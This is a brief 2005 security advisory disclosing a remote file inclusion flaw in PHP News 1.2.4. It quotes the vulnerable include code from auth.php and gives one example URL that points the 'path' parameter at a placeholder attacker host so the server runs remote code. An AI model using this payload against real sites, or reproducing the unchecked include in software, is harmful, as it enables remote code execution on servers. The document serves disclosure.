SecurityvulnsSECURITYVULNS:DOC:7965PHP News <= 1.2.4 - Remote File Inclusion (VXSfx)
– == – == – == – == – == – == – == – == – == –
Name: PHP News
Version: 1.2.4 (and possibly 1.2.3)
Homepage: http://newsphp.sourceforge.net/
Author: Filip Groszynski (VXSfx)
Date: 23 February 2005
– == – == – == – == – == – == – == – == – == –
Vulnerable code in auth.php:
if (is_Array($userDetails)) {
…
}
/* You're about to log in/no user language is specified */
else if(file_exists($path . 'languages/' . $lang . '.admin.lng')) {
include_once($path . 'languages/' . $lang . '.admin.lng');
…
} else {
include_once($path . 'languages/en_GB.admin.lng');
…
}
Example:
if register_globals=on and allow_url_fopen=on:
http://[victim]/[dir]/auth.php?path=http://[hacker_box]/
Fix and Vendor status:
Vendor has been notified, expect an official patch tomorrow.
Contact:
Author: Filip Groszynski (VXSfx)
Location: Poland <Warsaw>
Email: groszynskif <at> gmail <dot> com
HP: http://shell.homeunix.org
– == – == – == – == – == – == – == – == – == –